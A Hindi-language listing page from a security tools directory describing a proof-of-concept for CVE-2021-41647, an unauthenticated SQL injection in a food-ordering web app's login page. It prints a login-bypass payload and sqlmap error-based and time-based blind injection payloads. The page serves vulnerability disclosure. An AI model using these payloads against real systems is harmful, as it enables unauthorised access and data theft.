Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mobiusbinary/cve-2021-41647
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट ऑनलाइन-फूड-ऑर्डरिंग-वेब-ऐप में अनऑथेंटिकेटेड SQL इंजेक्शन के लिए, जो लॉगिन बायपास और एरर/टाइम-बेस्ड ब्लाइंड इंजेक्शन तकनीकों का प्रदर्शन करता है।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41647

CVE-2021-41647 SQL इंजेक्शन Online-Food-Ordering-Web-App में

Online-Food-Ordering-Web-App, अप्रमाणित त्रुटि और समय-आधारित ब्लाइंड SQL इंजेक्शन हमलों के लिए असुरक्षित है। /login.php पेज पर username पैरामीटर उपयोगकर्ता इनपुट को सैनिटाइज़ नहीं करता है, एक हमलावर एक सरल बायपास तकनीक का उपयोग करके लॉगिन को बायपास कर सकता है।

एप्लिकेशन का लिंक

Online-Food-Ordering-Web-App

प्रभावित घटक और पैरामीटर

URL: /login.php
पैरामीटर: username

POC

लॉगिन बायपास पेलोड

उपयोगकर्ता लॉगिन को बायपास करने और पूर्ण प्रशासनिक पहुँच प्राप्त करने के लिए, username इनपुट फ़ील्ड में पेलोड: user' or 1=1-- -

SQLMAP पेलोड

पैरामीटर: username (POST अनुरोध) प्रकार: त्रुटि-आधारित शीर्षक: MySQL >= 5.0 AND त्रुटि-आधारित - WHERE, HAVING, ORDER BY या GROUP BY क्लॉज़ (FLOOR) पेलोड: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

प्रकार: समय-आधारित ब्लाइंड शीर्षक: MySQL >= 5.0.12 AND समय-आधारित ब्लाइंड (क्वेरी SLEEP) पेलोड: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

यदि POC छवि स्पष्ट नहीं है, तो कृपया GIF पर क्लिक करें जो बेहतर रिज़ॉल्यूशन में लोड होगा।

POC

द्वारा खोजा गया

Jason Colyvas
MOBIUSBINARY
20 सितंबर, 2021

टूल डाउनलोड करें